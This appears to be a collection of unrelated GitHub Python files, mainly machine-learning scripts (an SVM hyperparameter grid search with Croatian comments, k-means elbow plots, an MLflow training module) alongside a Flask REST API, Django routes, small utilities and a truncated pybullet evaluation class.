jezgre za rbf, poly i sigmoidalnu funkciju.\nAnaliza će se provjeriti posebno za 3 jezgrene funkcije: rbf, poly i linear.\nNa kraju će se rezultati zapisati u excel datoteke posebno za svaki set podataka, u svakoj za sve 3 jezgrene funkcije.\n\n\"\"\"\n\n\nfrom Preprocessing import input_data, output_data\n# Ukoliko se žele stvarati novi podaci svaku skriptu, ovo NE treba biti zakomentirano\nfrom Preprocessing import divided_train_data, all_X_test_data\n\nimport openpyxl, pickle, os, shutil\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\n\noutput_SVM = output_data+\"C_SVM/\"\n\nwith open(input_data+'/divided_train_data.pickle', 'rb') as f_X_train:\n divided_train_data = pickle.load(f_X_train)\nwith open(input_data+'/all_X_test_data.pickle', 'rb') as f_test:\n all_X_test_data = pickle.load(f_test)\n\ntry:\n shutil.rmtree(output_SVM)\nexcept:\n FileNotFoundError\nos.mkdir(output_SVM)\n\n\n# Velika SVM funkcija koja računa točnost za rbf, poly i linear jezgrene funkcije z sve data setove\ndef grid_search(data_name, X_train, Y_train, X_valid, Y_valid):\n\n # Pomoćna funkcija koja ispisuje koliko je gotovo simulacija od ukupnog broja\n def current_sim_number(c,gamma, C_range, gamma_range):\n m = C_range.index(c)\n n = gamma_range.index(gamma) # indexi trenutnog položaja\n\n num = n * len(C_range) + m +1 # number of simulation\n percentage_over = num / (len(C_range) * len(gamma_range))\n percentage_over_str = (str(num) + \"/\" + str(len(C_range) * len(gamma_range)))\n print(percentage_over_str)\n return percentage_over\n\n\n # Postavljanje hiperparametara i excel datoteke za spremanje pretraživanja\n xlsx_name = output_SVM+\"Acc_SVM_\"+data_name+\".xlsx\" # ime excel file u koji se spremaju rezultati, kasnije\n Acc_grid_search = pd.ExcelWriter(xlsx_name) # stvaranje excela\n C_range = range(-10, -3) # rang baze za C\n gamma_range = range(-20, -5)\n C_f = lambda m: 2 ** m # Funkcije za računanje C i gamma\n gamma_f = lambda n: 2 ** n\n best_grid_acc = {\"radial_base\":[], \"poly\":[], \"linear\":[]}\n\n\n # SVM s radijalnom baznom funkcijom\n def radial_base_function():\n accuracity_matrix = {}\n max_acc = 0 # inicijalno postavljanje najbolje točnosti i array-project_data pozicija\n\n for gamma_ in gamma_range: # Pretraživanje za jedan red (C=..)\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = [] # Rezultati se spremaju u matricu\n\n for c_ in C_range: # Pretraživanje za jedan stupac (gamma=..)\n svcModel = SVC(C=C_f(c_), kernel=\"rbf\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"radial_base\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n best_grid_acc[\"radial_base\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n current_sim_number(c_, gamma_, C_range, gamma_range) # ispisuje gotove simulacije\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range] # imena indexa DataFrame-project_data, gamma=.. 
podaci\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n\n # Redovi su vrijednosti C, kolone vrijednosti gamma\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"radial_base\", startcol=0, startrow=0)\n\n radial_base_function()\n\n\n\n # Polinomijalna bazna funkcija\n def poly_function():\n C_range_poly = range(-15, -5)\n gamma_range_poly = range(-15, -5)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_poly:\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = []\n\n for c_ in C_range_poly:\n svcModel = SVC(C=C_f(c_), kernel=\"poly\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n current_sim_number(c_, gamma_, C_range_poly, gamma_range_poly)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"poly\"] = [[n_C, n_gamma]]\n\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n best_grid_acc[\"poly\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_poly]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"poly\", startcol=0, startrow=0)\n\n poly_function()\n\n\n\n\n def linear_function():\n gamma_range_linear = [1]\n C_range_linear = range(-15, -3)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_linear:\n accuracity_matrix[1] = []\n\n for c_ in C_range_linear:\n svcModel = SVC(C=C_f(c_), kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n accuracity_matrix[1].append([acc_train, acc_valid])\n current_sim_number(c_, gamma_, C_range_linear, gamma_range_linear)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"linear\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n best_grid_acc[\"linear\"].append([n_C, n_gamma])\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_linear]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"linear\", startcol=0, startrow=0) # Redovi su vrijednosti C, kolone vrijednosti gamma\n\n linear_function()\n\n\n Acc_grid_search.save() # Spremanje DF u excel file\n workbook=openpyxl.load_workbook(xlsx_name)\n\n # Otvara sve sheetove ovisno o rječniku gdje su spremljeni podaci\n for kernel_function in best_grid_acc.keys(): # iterira riječnik sa svim podacima točnosti\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).value = \"C/gamma\" # ispis u ćeliju\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).fill = \\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FFFF00\") # bojanje oznaka gamma, C\n\n # Iteracija po zapisanim 
koordinatama gdje se nalazi maksimalna točnost modela\n for position in best_grid_acc[kernel_function]:\n workbook.get_sheet_by_name(kernel_function).cell(row=2+position[0], column=2+position[1]).fill =\\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FF0000\")\n\n workbook.save(xlsx_name)\n\n\n####################################################################################################################\n\n# Iteracija po svim podacima spremljenim u pickle\nfor data_name in divided_train_data[\"X_train_data\"]:\n\n X_train = divided_train_data[\"X_train_data\"][data_name]\n Y_train = divided_train_data[\"Y_train_data\"][data_name]\n X_valid = divided_train_data[\"X_valid_data\"][data_name]\n Y_valid = divided_train_data[\"Y_valid_data\"][data_name]\n\n grid_search(data_name, X_train, Y_train, X_valid, Y_valid) # provodi cijelu analizu i izbacuje excel\n\n\n\n\n####################################################################################################################\n\n\n\n\n\n\n\"\"\"\nZaključak:\n\n - Model s početnim vrijenostima hiperparametara pokazuje najveću točnost za RBF jezgrenu funkciju. Daljnim \n podešavanjem hiperparametara moguće je postići veću točnost i za druge jezgre. Negativna stvar je da za \n veće vrijednosti hiperparametara modeli osjetno sporije konvergiraju te je potreban kompromis. \n \n\n -Nakon provedene analize zaključuje se da su veće vrijednosti hiperparametara optimalne (C=100, gamma=) te su \n također i stabilnije i ustaljene točnosti. C=1, gamma=1 su vrijednosti hiperparametara za koje model s \n osnovnim podacima ima općenito najveću točnost. \n \n -Rezultati pravilno konvergiraju rješenju kada se vrijednosti hiperparametara mijenjaju po kvadratnoj funkciji.\n \n -Modeli s drugim podacima i funkcijama imaju istu maksimalnu točnost, ALI se do nje može brže doći promjenom HP.\n -> pogotovo kod korištenja poly jezgrene funkcije\n \n -Vjerojatno se točnost kod poly modela može još malo podići uz dosta veću računalnu zahtjevnost - neisplativo\n\n\n\n\n # za čiste podatke odabrano:\n 0.5 / 0.125 - teško točno pogoditi jer se mijenjaju od seta do seta podataka\n\n # poly4: stabilniji rezultati\n 0.25/3e-6\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n# Funkcija koja ispisuje tablicu s koeficijentima korelacije (vaćnost svake kategorije za predviđanje)\ndef SVC_coeffs():\n\n X_train = divided_train_data[\"X_train_data\"][\"X\"]\n Y_train = divided_train_data[\"Y_train_data\"][\"X\"]\n X_valid = divided_train_data[\"X_valid_data\"][\"X\"]\n Y_valid = divided_train_data[\"Y_valid_data\"][\"X\"]\n\n # svcModel = SVC(C=0.5, kernel=\"rbf\", gamma=0.125)\n svcModel = SVC(C=33, kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n # acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n # prediction = svcModel.predict(X_valid)\n # acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n\n\n coeff_df = pd.DataFrame(X_train.columns)\n coeff_df.columns = ['Feature']\n coeff_df[\"Correlation\"] = pd.Series(svcModel.coef_[0])\n coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n coeff_df = coeff_df.reset_index(drop=True)\n\n print(coeff_df)\n\n return coeff_df\n\n\nSVC_coeffs()\n\n\n # coeff_df = pd.DataFrame(train_X.columns)\n # coeff_df.columns = ['Feature']\n # coeff_df[\"Correlation\"] = pd.Series(svc.coef_[0])\n # coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n # coeff_df = 
coeff_df.reset_index(drop=True)","repo_name":"jzivic/Titanic_project","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70784761288","text":"import logging\nfrom dataclasses import dataclass\n\nimport pandas as pd\nfrom lit_ds_utils.decorate.logging import log_function\nfrom sklearn.model_selection import train_test_split\n\nfrom .. import settings\nfrom ..config.constants import (\n DATABRICKS_EXPERIMENT_NAME,\n DATABRICKS_GROUP_NAME,\n DATABRICKS_REGISTERED_MODEL_NAME,\n MODEL_ARTIFACT,\n)\nfrom ..utils.utils import save_local_artifact\nfrom .build import build_model\nfrom .log_model import wrap_and_log_model\n\nlogger = logging.getLogger(__name__)\n\nEXPERIMENT_NAME = settings.str(DATABRICKS_EXPERIMENT_NAME)\nMODEL_NAME = settings.str(DATABRICKS_REGISTERED_MODEL_NAME)\nGROUP_NAME = settings.str(DATABRICKS_GROUP_NAME)\n\n\n@dataclass()\nclass TrainTestSplits:\n \"\"\"Train, test and holdout splits.\"\"\"\n\n train_df: pd.DataFrame\n test_df: pd.DataFrame\n\n\n@log_function()\ndef train_and_log_model(train_df: pd.DataFrame, test_df: pd.DataFrame) -> None:\n \"\"\"Run an ML Flow experiment and log to databricks using the args sent in.\n\n Args:\n train_df: Train df\n test_df: Test df.\n \"\"\"\n logger.info(\"Building model\")\n model = build_model(train_df=train_df)\n save_local_artifact(MODEL_ARTIFACT, model)\n\n logger.info(\"Logging model to MLFlow\")\n wrap_and_log_model(model, test_df=test_df)\n\n\n@log_function()\ndef get_train_test_splits(input_df: pd.DataFrame) -> TrainTestSplits:\n \"\"\"Split the supplied data into training, test and holdout splits.\n\n Args:\n input_df: The dataframe to split.\n\n Returns:\n The train, test and holdout splits.\n \"\"\"\n\n train_df = input_df[input_df['policy_year'] < 2017]\n test_df = input_df[input_df['policy_year'] == 2017]\n\n return TrainTestSplits(train_df, test_df)\n","repo_name":"judemd/ml-playground","sub_path":"ml-template-main/pipeline/model/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36780865148","text":"import re, bs4, string\nfrom project.server.main.parsers.strings import get_clean_text\n\ndef parse_fallback_tags(soup, doi):\n\n res = {'doi': doi}\n affiliations = []\n affiliation_regex = re.compile(\"affili|institution\")\n potential_elts = []\n potential_elts += soup.find_all(id= affiliation_regex) \n potential_elts += soup.find_all(class_= affiliation_regex)\n\n potential_aff = []\n\n for p in potential_elts:\n current_name = get_clean_text(p)\n potential_aff.append(current_name)\n\n #for e in soup.find_all(\"sup\"):\n # if len(get_clean_text(e)) == 1:\n # potential_aff.append(get_clean_text(e.next.next))\n\n for current_name in potential_aff:\n for k in [\"Affiliation\", \"Author Information\"]:\n current_name = current_name.replace(k, \"\").strip()\n if current_name.startswith(';'):\n continue\n if len(current_name.split(' ')) < 2:\n continue\n if len(current_name) > 2:\n current_aff = {'name': current_name}\n if current_aff not in affiliations:\n affiliations.append(current_aff)\n if affiliations:\n res['affiliations'] = affiliations\n\n return 
res\n","repo_name":"dataesr/bso-parser-html","sub_path":"project/server/main/parsers/fallback_tags.py","file_name":"fallback_tags.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11899500140","text":"from flask import Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom app.db import db\n\nfrom app.countries.models import Country\nfrom .models import University\n\n\nbp = Blueprint('universities', __name__, url_prefix='/universities')\n\n\nclass UniversityBaseView(MethodView):\n def is_column_unique(self, column, value): \n \"\"\"\n Example:\n 'world_rank', 98, \n 'name', 'Some university'\n \"\"\"\n return University.query.filter_by(**{column: value}).first() is None\n\n def is_name_unique(self, name):\n return University.query.filter_by(name=name).first() is None\n\n def get_country(self, country_id):\n return Country.query.filter_by(id=country_id).first()\n\n def validate_data(self, data):\n fields = {\n 'name': str,\n 'world_rank': int,\n 'score': float,\n 'country_id': int,\n }\n\n errors = {}\n for field, _type in fields.items():\n try:\n data[field] = _type(data[field])\n except (KeyError, TypeError, ValueError):\n errors[field] = 'invalid'\n \n return data, errors\n\n\nclass UniversityListCreateView(UniversityBaseView):\n def get(self):\n limit = 20\n\n rows = University.query.limit(limit)\n\n page = request.args.get('page', '1')\n if page and page.isnumeric():\n page = int(page)\n rows = rows.offset((page - 1) * limit)\n\n response = [{'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id} for row in rows]\n\n return jsonify(response)\n\n def post(self):\n data = request.json\n\n data, errors = self.validate_data(request.json)\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n if not self.is_column_unique('name', data['name']):\n errors['name'] = 'unique'\n \n if not self.is_column_unique('world_rank', data['world_rank']):\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n u = University(\n name=data['name'], \n world_rank=data['world_rank'], \n score=data['score'],\n country_id=data['country_id'],\n )\n db.session.add(u)\n db.session.commit()\n db.session.refresh(u)\n\n return jsonify({'id': u.id}), 201 # created\n\n\nclass UniversityDetailUpdateDeleteView(UniversityBaseView):\n def get_object_by_id(self, university_id):\n return University.query.filter_by(id=university_id).first()\n\n def get(self, university_id):\n row = self.get_object_by_id(university_id)\n if row is None:\n return jsonify({'error': 'not_found'}), 404\n\n return jsonify({'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id})\n\n def put(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n \n data, errors = self.validate_data(request.json)\n \n if len(errors):\n return jsonify({'error': errors}), 400\n\n if University.query.filter(University.id != university_id).filter_by(name=data['name']).first():\n errors['name'] = 'unique'\n\n if University.query.filter(University.id != university_id).filter_by(world_rank=data['world_rank']).first():\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n 
errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n university.name=data['name']\n university.world_rank=data['world_rank']\n university.score=data['score']\n university.country_id=data['country_id']\n \n db.session.commit()\n\n return jsonify({'id': university.id}), 200 # created\n\n def delete(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n\n db.session.delete(university)\n db.session.commit()\n\n return jsonify({'deleted': 'ok'})\n\n\nbp.add_url_rule('/', view_func=UniversityListCreateView.as_view('universities'))\nbp.add_url_rule('/<university_id>/', view_func=UniversityDetailUpdateDeleteView.as_view('university'))\n","repo_name":"Argam431/RESTFULL-Api","sub_path":"app/universities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70330457928","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.spatial.distance import cdist, pdist\nfrom sklearn.cluster import KMeans\n\n# CHARACTER_DATA_FILE = './spambase.data'\n# char_data = pd.read_csv(CHARACTER_DATA_FILE)\n# char_x = char_data[[x for x in char_data.columns if x != \"spam\"]]\n\nraw_data = pd.read_csv('spambase.data', sep = ',', header=None) # 4601 instances\nchar_x = raw_data.drop([57], axis=1)\n# labels = raw_data[[57]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 3680 + 921 instances\n\n# WINE_DATA_FILE = './satellite.data'\n# wine_data = pd.read_csv(WINE_DATA_FILE)\n# wine_x = wine_data[[x for x in wine_data.columns if x != \"quality\"]]\nraw_data = pd.read_csv('satellite.data', sep = ' ', header=None) # 6435 instances\nwine_x = raw_data.drop([36], axis=1)\n# labels = raw_data[[36]]\n# train_data, test_data, train_label, test_label = train_test_split(data, labels, test_size=0.2) # 5148 + 1287 instances\n\n\n\n\n\n\n\n# Train kmean models, once for each value of k (aka create k clusters ea time)\nK = range(1, 40)\nKM_c = [KMeans(n_clusters=k).fit(char_x) for k in K]\nKM_w = [KMeans(n_clusters=k).fit(wine_x) for k in K]\nprint(\"Trained kmean models\")\n\n# For ea val of k, find centroids of ea of their clusters\ncentroids_c = [km.cluster_centers_ for km in KM_c]\ncentroids_w = [km.cluster_centers_ for km in KM_w]\nprint(\"Found the centroids\")\n\n# Calc euclid dist from data pt to center of cluster it belongs to\nDk_c = [cdist(char_x, center, 'euclidean') for center in centroids_c]\nDk_w = [cdist(wine_x, center, 'euclidean') for center in centroids_w]\nprint(\"Calculated euclidean distance\")\n\ncIdx_c = [np.argmin(D, axis=1) for D in Dk_c]\ndist_c = [np.min(D, axis=1) for D in Dk_c]\navgWithinSS_c = [sum(d) / char_x.shape[0] for d in dist_c]\n\n# Total with-in sum of square\nwcss_c = [sum(d**2) for d in dist_c]\ntss_c = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_c = tss_c - wcss_c\ncIdx_w = [np.argmin(D, axis=1) for D in Dk_w]\ndist_w = [np.min(D, axis=1) for D in Dk_w]\navgWithinSS_w = [sum(d) / char_x.shape[0] for d in dist_w]\n\n# Total with-in sum of square\nwcss_w = [sum(d**2) for d in dist_w]\ntss_w = sum(pdist(char_x)**2) / char_x.shape[0]\nbss_w = tss_w - wcss_w\nprint(\"Calculated sum of square errors\")\nkIdx_c = 9\nkIdx_w = 4\nplt.style.use('ggplot')\n\n# elbow curve\nfig = plt.figure()\nax = 
fig.add_subplot(111)\nax.plot(K, avgWithinSS_c, '*-', label='Spambase')\nax.plot(K[kIdx_c], avgWithinSS_c[kIdx_c], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='r', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow1.png')\nplt.show()\n\n# elbow curve\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, avgWithinSS_w, '*-', label='Satellite')\nax.plot(K[kIdx_w], avgWithinSS_w[kIdx_w], marker='o', markersize=12,\n markeredgewidth=2, markeredgecolor='b', markerfacecolor='None')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Average within-cluster sum of squares')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow2.png')\nplt.show()\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_c / tss_c * 100, '*-', label='Spambase')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow3.png')\nplt.show()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.plot(K, bss_w / tss_w * 100, '*-', label='Satellite')\nplt.grid(True)\nplt.xlabel('Number of clusters')\nplt.ylabel('Percentage of variance explained')\nplt.legend(loc='best')\nplt.title('Elbow for KMeans clustering')\nfig.savefig('graphs/kmeans/elbow4.png')\nplt.show()","repo_name":"jpan68/ML-datasets","sub_path":"HW3 - Unsupervised Learning & Dimensionality Reduction/clustering_kmeans.py","file_name":"clustering_kmeans.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71227335048","text":"from django.urls import path\nfrom blogapp import views # импортируем вьюшки\n\n\napp_name = 'blogapp'\n\nurlpatterns = [\n path('', views.main_view, name='index'),\n path('create/', views.create_post, name='create'),\n path('post/<int:id>/', views.post, name='post')\n]\n","repo_name":"DmitriChe/django-blog20_orm","sub_path":"blog/blogapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2598405509","text":"\"\"\"\nTest for file IO\n\"\"\"\nimport os\n\nfrom bioptim import PhaseDynamics\nimport numpy as np\nimport pytest\n\n\n@pytest.mark.parametrize(\"phase_dynamics\", [PhaseDynamics.SHARED_DURING_THE_PHASE, PhaseDynamics.ONE_PER_NODE])\ndef test_double_pendulum_torque_driven_IOCP(phase_dynamics):\n # Load double pendulum ocp\n from bioptim.examples.inverse_optimal_control import double_pendulum_torque_driven_IOCP as ocp_module\n\n bioptim_folder = os.path.dirname(ocp_module.__file__)\n biorbd_model_path = bioptim_folder + \"/models/double_pendulum.bioMod\"\n\n ocp = ocp_module.prepare_ocp(\n weights=[0.4, 0.3, 0.3],\n coefficients=[1, 1, 1],\n biorbd_model_path=biorbd_model_path,\n phase_dynamics=phase_dynamics,\n n_threads=4 if phase_dynamics == PhaseDynamics.SHARED_DURING_THE_PHASE else 1,\n expand_dynamics=True,\n )\n\n sol = ocp.solve()\n\n # Check constraints\n g = np.array(sol.constraints)\n\n # Check some of the results\n states, controls = sol.states, sol.controls\n q, qdot, tau = states[\"q\"], states[\"qdot\"], controls[\"tau\"]\n\n np.testing.assert_equal(g.shape, (120, 1))\n 
np.testing.assert_almost_equal(g, np.zeros((120, 1)))\n\n # Check objective function value\n f = np.array(sol.cost)\n np.testing.assert_equal(f.shape, (1, 1))\n np.testing.assert_almost_equal(f[0, 0], 13.03787939)\n\n # initial and final position\n np.testing.assert_almost_equal(q[:, 0], np.array([-3.14159265, 0.0]))\n np.testing.assert_almost_equal(q[:, -1], np.array([3.14159265, 0.0]))\n\n # initial and final velocities\n np.testing.assert_almost_equal(qdot[:, 0], np.array([-3.32315017, 15.70796327]))\n np.testing.assert_almost_equal(qdot[:, -1], np.array([3.0362723, -2.87576071]))\n\n # initial and final controls\n np.testing.assert_almost_equal(tau[:, 0], np.array([-11.49023683]))\n np.testing.assert_almost_equal(tau[:, -2], np.array([0.04617407]))\n","repo_name":"pyomeca/bioptim","sub_path":"tests/shard2/test_global_inverse_optimal_control.py","file_name":"test_global_inverse_optimal_control.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"16"} +{"seq_id":"34762652298","text":"# Dependencies\r\nimport csv \r\n#csv read\r\nwith open ('budget_data.csv') as csvfile: \r\n\r\n csvreader=csv.reader(csvfile, delimiter=',') \r\n header=next(csvreader) \r\n\r\n #Variables and Conditions\r\n months=[] \r\n prolosses=[] \r\n\r\n \r\n total=0\r\n a_change=0\r\n m_change=0\r\n m_count=0\r\n delta1=0\r\n delta2=0\r\n delta_line1=0\r\n delta_line2=0\r\n loop1=0\r\n loop2=0\r\n\r\n #Read\r\n for row in csvreader:\r\n month=row[0] \r\n proloss=row[1] \r\n months.append(month) \r\n prolosses.append(proloss) \r\n \r\n m_count = len(months) \r\n\r\n\r\n#analysis\r\n\r\n#loop1\r\nfor loop1 in range (m_count):\r\n total=total+int(prolosses[loop1]) \r\n\r\n#loop2 (calculation)\r\nfor loop2 in range (m_count-1): #Restrict loop to avoid overflow (last line +1)\r\n a_change=a_change+(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n\r\n m_change=(float(prolosses[loop2+1])-float(prolosses[loop2])) \r\n if m_change>delta1: \r\n delta1=m_change\r\n delta_line1=loop2\r\n else:\r\n delta1=delta1\r\n\r\n if m_change<delta2: \r\n delta2=m_change\r\n delta_line2=loop2\r\n else:\r\n delta2=delta2\r\n\r\n#output\r\n\r\nanalysis=f'\\\r\nFinancial Analysis\\n\\\r\n----------------------------\\n\\\r\nTotal Months: {m_count}\\n\\\r\nTotal Amount: ${total}\\n\\\r\nAverage Change: ${round(a_change/(m_count-1),2)}\\n\\\r\nGreatest Increase in Profits: {months[delta_line1+1]} (${int(delta1)})\\n\\\r\nGreatest Decrease in Profits: {months[delta_line2+1]} (${int(delta2)})\\n'\r\n\r\nprint(analysis) \r\n\r\n#txt file\r\n\r\nfile1=open(\"pybank.txt\",\"w\") \r\nfile1.writelines(analysis) \r\nfile1.close() ","repo_name":"Tmoht1015/Module3","sub_path":"Bank/Pybank.py","file_name":"Pybank.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36516688320","text":"# search ab element in 2d sorted array\n# the array is sorted in its each row and in each column\n\ndef search(array, key):\n\n i = 0\n j = len(array[i])-1\n\n while i < len(array) and j < len(array[i]):\n current = array[i][j]\n if current == key:\n return [i, j]\n elif current > key:\n j -= 1\n else:\n i += 1\n return -1\n\n\narray = [\n [10, 20, 30, 40],\n [15, 25, 35, 45],\n [27, 29, 37, 48],\n [32, 33, 39, 52]\n]\n\nprint(search(array, 
52))","repo_name":"pulkitmunjral/DSA_python","sub_path":"Other/searchin2dSortedarray.py","file_name":"searchin2dSortedarray.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40959661603","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport random\nimport glob\nimport sys, os\nimport math\nimport pybullet_data\nimport scipy.misc\nfrom skimage.draw import line, polygon\nfrom custom_utils import load_model, TURTLEBOT_URDF, joints_from_names, \\\n set_joint_positions, HideOutput, get_bodies, sample_placement, pairwise_collision, \\\n set_point, Point, create_box, stable_z, TAN, GREY, connect, PI, OrderedSet, \\\n wait_if_gui, dump_body, set_all_color, BLUE, child_link_from_joint, link_from_name, draw_pose, Pose, pose_from_pose2d, \\\n get_random_seed, get_numpy_seed, set_random_seed, set_numpy_seed, plan_joint_motion, plan_nonholonomic_motion, \\\n joint_from_name, safe_zip, draw_base_limits, BodySaver, WorldSaver, LockRenderer, elapsed_time, disconnect, flatten, \\\n INF, wait_for_duration, get_unbuffered_aabb, draw_aabb, DEFAULT_AABB_BUFFER, get_link_pose, get_joint_positions, \\\n get_subtree_aabb, get_pairs, get_distance_fn, get_aabb, set_all_static, step_simulation, get_bodies_in_region, \\\n AABB, update_scene, Profiler, pairwise_link_collision, BASE_LINK, get_collision_data, draw_pose2d, \\\n normalize_interval, wrap_angle, CIRCULAR_LIMITS, wrap_interval, Euler, rescale_interval, adjust_path, WHITE, RED, \\\n sample_pos_in_env, remove_body, get_euler, get_point, get_config, reset_sim, set_pose, get_quat,euler_from_quat, \\\n quat_from_euler, pixel_from_point, create_cylinder, create_capsule, create_sphere\nclass Eval:\n def __init__(self, sim, utils):\n self.sim = sim\n self.utils = utils\n self.success_list = []\n self.reward_list = []\n self.run_length_list = []\n self.path_length_list = []\n self.current_path_length = 0\n self.current_path = []\n self.current_initial_image = None\n self.global_count = 0\n\n def evaluation_reset(self):\n which_obstacle = self.sim.evaluation_sample[\"obstacle_scenario_id\"]\n self.utils.choose_obstacle_build(which_obstacle)\n self.utils.reset_obj_fix(self.sim.pushing_object_id, self.sim.evaluation_sample[\"start\"])\n self.sim.step_simulation(self.sim.per_step_iterations)\n self.sim.current_obj_conf = 